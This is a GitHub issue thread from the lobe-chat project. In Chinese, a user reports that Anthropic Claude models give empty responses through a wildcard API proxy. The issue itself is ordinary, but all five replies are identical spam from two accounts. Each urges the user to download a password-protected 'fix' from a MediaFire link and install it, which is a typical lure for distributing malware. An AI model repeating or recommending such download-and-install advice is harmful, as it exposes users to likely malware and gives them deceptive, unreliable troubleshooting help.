### ISSUE TITLE
[Bug] 使用wildcard代理的api，claude的模型没有内容响应

### ISSUE THREAD

**Issue by AquaHydro** [lobehub/lobe-chat#3698]
### 📦 部署环境

Vercel

### 📌 软件版本

chore(release): v1.15.2

### 💻 系统环境

Windows

### 🌐 浏览器

Chrome

### 🐛 问题描述

设置中测试是没问题的，wildcard代理的openAi gpt没问题，但anthropic claude空白响应。在[next-chat](https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web/)中使用没问题。
![image](https://github.com/user-attachments/assets/9553a3a7-dbea-4284-a6c0-ea29e5cf668f)

![image](https://github.com/user-attachments/assets/3d722f20-a093-4cb2-ae6a-d12314ba9661)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
